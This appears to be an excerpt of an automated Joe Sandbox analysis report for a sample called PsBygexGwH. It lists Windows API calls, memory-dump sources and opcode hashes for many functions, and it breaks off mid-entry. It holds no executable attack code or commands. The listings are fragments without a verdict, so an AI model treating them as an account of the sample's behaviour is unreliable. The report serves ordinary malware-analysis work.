                                                          • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00143B7C
                                                          • CallCatchBlock.LIBVCRUNTIME ref: 00143BA4
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                          • String ID:
                                                          • API String ID: 737400349-0
                                                          • Opcode ID: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                                                          • Instruction ID: 1b091a12bb0c4c552292e34e0e1de3de7d30ba2fa069f017a2980fbb3436e4a6
                                                          • Opcode Fuzzy Hash: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                                                          • Instruction Fuzzy Hash: 1E010832100149BBDF126E95CC46EEB7F6EEFA8754F044118FE58A6131C732E961EBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,001213C6,00000000,00000000,?,0015301A,001213C6,00000000,00000000,00000000,?,0015328B,00000006,FlsSetValue), ref: 001530A5
                                                          • GetLastError.KERNEL32(?,0015301A,001213C6,00000000,00000000,00000000,?,0015328B,00000006,FlsSetValue,001C2290,FlsSetValue,00000000,00000364,?,00152E46), ref: 001530B1
                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0015301A,001213C6,00000000,00000000,00000000,?,0015328B,00000006,FlsSetValue,001C2290,FlsSetValue,00000000), ref: 001530BF
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: LibraryLoad$ErrorLast
                                                          • String ID:
                                                          • API String ID: 3177248105-0
                                                          • Opcode ID: 0a650472d57af5fa19fc0f5ff907e6b6a6333c90443e768d1878a3456b387ae1
                                                          • Instruction ID: 8517c3339c14b9020f796eea6ed2a84d08944552a6d732d11dc567866f55f209
                                                          • Opcode Fuzzy Hash: 0a650472d57af5fa19fc0f5ff907e6b6a6333c90443e768d1878a3456b387ae1
                                                          • Instruction Fuzzy Hash: 3101D432301322EBCB224A78DC849677B98AF45BE2B110720FD35EB180C721D949C6E0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 0018747F
                                                          • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00187497
                                                          • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 001874AC
                                                          • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 001874CA
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: Type$Register$FileLoadModuleNameUser
                                                          • String ID:
                                                          • API String ID: 1352324309-0
                                                          • Opcode ID: 59c4a894568008e06871136485151faaf0d62e8ba1e14dc05eacf529b26cdbc3
                                                          • Instruction ID: 3f3b16a59ed26e548e87f0bf285a71a04dddc6b0bd7330606eaea1236cfff435
                                                          • Opcode Fuzzy Hash: 59c4a894568008e06871136485151faaf0d62e8ba1e14dc05eacf529b26cdbc3
                                                          • Instruction Fuzzy Hash: 8E11C0B1209310AFE720AF54DC08FA27FFCEB00B10F208569A656D6591D7B0EA44DFA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0018ACD3,?,00008000), ref: 0018B0C4
                                                          • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0018ACD3,?,00008000), ref: 0018B0E9
                                                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0018ACD3,?,00008000), ref: 0018B0F3
                                                          • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0018ACD3,?,00008000), ref: 0018B126
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: CounterPerformanceQuerySleep
                                                          • String ID:
                                                          • API String ID: 2875609808-0
                                                          • Opcode ID: 8a2570d086b3ab92876c03728131da19f6ad8959ce7c2c3fa6f3b77530fbb30a
                                                          • Instruction ID: 8bb6f72be4f0b7e2a95fafa689d6b6e62e243b15c6f839910cddb522037c4c7b
                                                          • Opcode Fuzzy Hash: 8a2570d086b3ab92876c03728131da19f6ad8959ce7c2c3fa6f3b77530fbb30a
                                                          • Instruction Fuzzy Hash: 47115B71C0562CEBCF04EFE8E9A86EEBB78FF09711F114186E981B6181CB3056908B91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetWindowRect.USER32(?,?), ref: 001B7E33
                                                          • ScreenToClient.USER32(?,?), ref: 001B7E4B
                                                          • ScreenToClient.USER32(?,?), ref: 001B7E6F
                                                          • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 001B7E8A
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: ClientRectScreen$InvalidateWindow
                                                          • String ID:
                                                          • API String ID: 357397906-0
                                                          • Opcode ID: 6d9b32acecd73ed50ef16e230455dcccf14f1ca59c116b486b7033e07f9e954a
                                                          • Instruction ID: dc5524c6cdd686c62366883c84582f7a106db3199424e4509d29e0c74cdd5278
                                                          • Opcode Fuzzy Hash: 6d9b32acecd73ed50ef16e230455dcccf14f1ca59c116b486b7033e07f9e954a
                                                          • Instruction Fuzzy Hash: 161156B9D0024AAFDB41CF98C8849EEBBF5FF18310F505166E915E3610D735AA94CF90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00182DC5
                                                          • GetWindowThreadProcessId.USER32(?,00000000), ref: 00182DD6
                                                          • GetCurrentThreadId.KERNEL32 ref: 00182DDD
                                                          • AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00182DE4
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                          • String ID:
                                                          • API String ID: 2710830443-0
                                                          • Opcode ID: 5ed60016c57cb143e6af3eba3de145c433a5ad1f1b65bf5a540383ec67887fa2
                                                          • Instruction ID: 3a99732c72af303ae8b505694add592365ef468a431e644d5df3b416e7d4e5a0
                                                          • Opcode Fuzzy Hash: 5ed60016c57cb143e6af3eba3de145c433a5ad1f1b65bf5a540383ec67887fa2
                                                          • Instruction Fuzzy Hash: F6E0ED72501224BBD7212BA69C0DEEB7F6CEB56BA1F400215F505D1591ABA58981CAF0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 00139639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00139693
                                                            • Part of subcall function 00139639: SelectObject.GDI32(?,00000000), ref: 001396A2
                                                            • Part of subcall function 00139639: BeginPath.GDI32(?), ref: 001396B9
                                                            • Part of subcall function 00139639: SelectObject.GDI32(?,00000000), ref: 001396E2
                                                          • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 001B8887
                                                          • LineTo.GDI32(?,?,?), ref: 001B8894
                                                          • EndPath.GDI32(?), ref: 001B88A4
                                                          • StrokePath.GDI32(?), ref: 001B88B2
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                          • String ID:
                                                          • API String ID: 1539411459-0
                                                          • Opcode ID: 5e438dd9071b5371ea4e18862a587daa81accf7e3841d7a7ae9cb3991ba7541a
                                                          • Instruction ID: 9ab927976a1019df3d5a3366833eb9eb603cb6896597b32560c2ffe21bd9df70
                                                          • Opcode Fuzzy Hash: 5e438dd9071b5371ea4e18862a587daa81accf7e3841d7a7ae9cb3991ba7541a
                                                          • Instruction Fuzzy Hash: 43F0823A041259FBDB126F94AC0EFDE3F59AF06710F048100FA11654E1C7B55591CFE5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetSysColor.USER32(00000008), ref: 001398CC
                                                          • SetTextColor.GDI32(?,?), ref: 001398D6
                                                          • SetBkMode.GDI32(?,00000001), ref: 001398E9
                                                          • GetStockObject.GDI32(00000005), ref: 001398F1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: Color$ModeObjectStockText
                                                          • String ID:
                                                          • API String ID: 4037423528-0
                                                          • Opcode ID: 12b586624e4fd81091d16edd42973f2a4ca253dd294ed26c5f177d7b54c4744b
                                                          • Instruction ID: 0acaad84c9534a4ad208fc934e194ec4b5c105c5463695a577cafbbe90c63e9a
                                                          • Opcode Fuzzy Hash: 12b586624e4fd81091d16edd42973f2a4ca253dd294ed26c5f177d7b54c4744b
                                                          • Instruction Fuzzy Hash: 2DE06D31244280EADB215B79AC09BE83F21AB52336F04C319F6FA684E1C37146809B20
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetCurrentThread.KERNEL32 ref: 00181634
                                                          • OpenThreadToken.ADVAPI32(00000000,?,?,?,001811D9), ref: 0018163B
                                                          • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,001811D9), ref: 00181648
                                                          • OpenProcessToken.ADVAPI32(00000000,?,?,?,001811D9), ref: 0018164F
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: CurrentOpenProcessThreadToken
                                                          • String ID:
                                                          • API String ID: 3974789173-0
                                                          • Opcode ID: a4e384fb962aa544a2d2c1a262295a29c5e4c5b2dcb544cfd1fc0a154f9c4014
                                                          • Instruction ID: 3e29adb8fd7dde1912b172fb4f3666dd2fe5fa2a0cd6211dd413956a632d28f5
                                                          • Opcode Fuzzy Hash: a4e384fb962aa544a2d2c1a262295a29c5e4c5b2dcb544cfd1fc0a154f9c4014
                                                          • Instruction Fuzzy Hash: A9E08636601211EBD7202FA09D0DB873B7CAF54791F184918F285C9090E7744581CBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetDesktopWindow.USER32 ref: 0017D858
                                                          • GetDC.USER32(00000000), ref: 0017D862
                                                          • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0017D882
                                                          • ReleaseDC.USER32(?), ref: 0017D8A3
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: CapsDesktopDeviceReleaseWindow
                                                          • String ID:
                                                          • API String ID: 2889604237-0
                                                          • Opcode ID: ef4506b7cc76b5e32ce10f6c0fd2d45c96226145282eb80031612656f95be27d
                                                          • Instruction ID: a1328ea046efbd75fb15ab21eb0b422e7b3c115e5c80c634c47f535f18466947
                                                          • Opcode Fuzzy Hash: ef4506b7cc76b5e32ce10f6c0fd2d45c96226145282eb80031612656f95be27d
                                                          • Instruction Fuzzy Hash: 0CE01AB4C00204DFCB45AFA4E948A6DBBB1FB48310F118109F806E7750C7384991AF90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetDesktopWindow.USER32 ref: 0017D86C
                                                          • GetDC.USER32(00000000), ref: 0017D876
                                                          • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0017D882
                                                          • ReleaseDC.USER32(?), ref: 0017D8A3
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: CapsDesktopDeviceReleaseWindow
                                                          • String ID:
                                                          • API String ID: 2889604237-0
                                                          • Opcode ID: 454cefad7a0b21e26fa37c1b5e18c3eeebbc1d7579dac0b6461329ae9a6b130a
                                                          • Instruction ID: d5b768b576ce1493713bebbfc698578b83e52a932c1a9305a401a67fda38c525
                                                          • Opcode Fuzzy Hash: 454cefad7a0b21e26fa37c1b5e18c3eeebbc1d7579dac0b6461329ae9a6b130a
                                                          • Instruction Fuzzy Hash: C0E012B4C00204EFCB40AFA8E848A6DBBB1BB48310F108108F90AE7750CB385981AF90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 00127620: _wcslen.LIBCMT ref: 00127625
                                                          • WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00194ED4
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: Connection_wcslen
                                                          • String ID: *$LPT
                                                          • API String ID: 1725874428-3443410124
                                                          • Opcode ID: c71977a65d0d9a1a141615ac82b5f3b19dcaf1ac1b303a2502aaed7e4022fbf3
                                                          • Instruction ID: 501192f71e3288f7af80a18934fdac34bd9c78489b461a16890f0cecf5b06d63
                                                          • Opcode Fuzzy Hash: c71977a65d0d9a1a141615ac82b5f3b19dcaf1ac1b303a2502aaed7e4022fbf3
                                                          • Instruction Fuzzy Hash: 12917175A002159FCB14DF58C484EAABBF1BF48304F198099E80A9F7A2D735ED86CB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • __startOneArgErrorHandling.LIBCMT ref: 0014E30D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: ErrorHandling__start
                                                          • String ID: pow
                                                          • API String ID: 3213639722-2276729525
                                                          • Opcode ID: 7218483f8b64d7c6395249ee794c77f09cd665a7621e8e69091cc26988729808
                                                          • Instruction ID: 5ff6ea64886f49594c98cde2ceaf35572b825e12b51b92efecf2f61ac1178436
                                                          • Opcode Fuzzy Hash: 7218483f8b64d7c6395249ee794c77f09cd665a7621e8e69091cc26988729808
                                                          • Instruction Fuzzy Hash: 9C518E61A0C202D7CB167B14E9137793BE4FB50742F344968E8E58A2F9DB31CCC99A46
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: #
                                                          • API String ID: 0-1885708031
                                                          • Opcode ID: fe0c4c036b17520e134753e8d6f071a05f347e3e4b7c33263d0e3d68092c9ed4
                                                          • Instruction ID: d1181666c979c95bfe3371d8f6a8de631316395ec46a986dd885eee0e8599e97
                                                          • Opcode Fuzzy Hash: fe0c4c036b17520e134753e8d6f071a05f347e3e4b7c33263d0e3d68092c9ed4
                                                          • Instruction Fuzzy Hash: C4512335504346EFDB19DF68D481ABA7BF8EF29310F248099F8959B2D0D7349D52CBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • Sleep.KERNEL32(00000000), ref: 0013F2A2
                                                          • GlobalMemoryStatusEx.KERNEL32(?), ref: 0013F2BB
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: GlobalMemorySleepStatus
                                                          • String ID: @
                                                          • API String ID: 2783356886-2766056989
                                                          • Opcode ID: 93fff316f6be2e31da707982c82c6b16a03fd20afe13d472a6fb5b8b49ad36de
                                                          • Instruction ID: 1203bec449c4423e0ce5983f67619601798ebae293c9eda62bc3996a215808a0
                                                          • Opcode Fuzzy Hash: 93fff316f6be2e31da707982c82c6b16a03fd20afe13d472a6fb5b8b49ad36de
                                                          • Instruction Fuzzy Hash: 6A512872408744ABD320AF54EC86BAFBBF8FB95300F81885DF1D941195EB708579CBA6
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • CharUpperBuffW.USER32(?,?,?,00000003,?,?), ref: 001A57E0
                                                          • _wcslen.LIBCMT ref: 001A57EC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: BuffCharUpper_wcslen
                                                          • String ID: CALLARGARRAY
                                                          • API String ID: 157775604-1150593374
                                                          • Opcode ID: 9e04cfa05434b4351bb11b04092f64ceaa23e252a7d9d3bc88ce5173ad89c428
                                                          • Instruction ID: 416c032b58f4aec6b41b6d60309fea77823b70acc799a004f2e8edaca4909b0b
                                                          • Opcode Fuzzy Hash: 9e04cfa05434b4351bb11b04092f64ceaa23e252a7d9d3bc88ce5173ad89c428
                                                          • Instruction Fuzzy Hash: 3541A135E042099FCB14DFA9C8819AEBBF6FF6A324F144029E505A7291E7349D81CB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • _wcslen.LIBCMT ref: 0019D130
                                                          • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 0019D13A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: CrackInternet_wcslen
                                                          • String ID: |
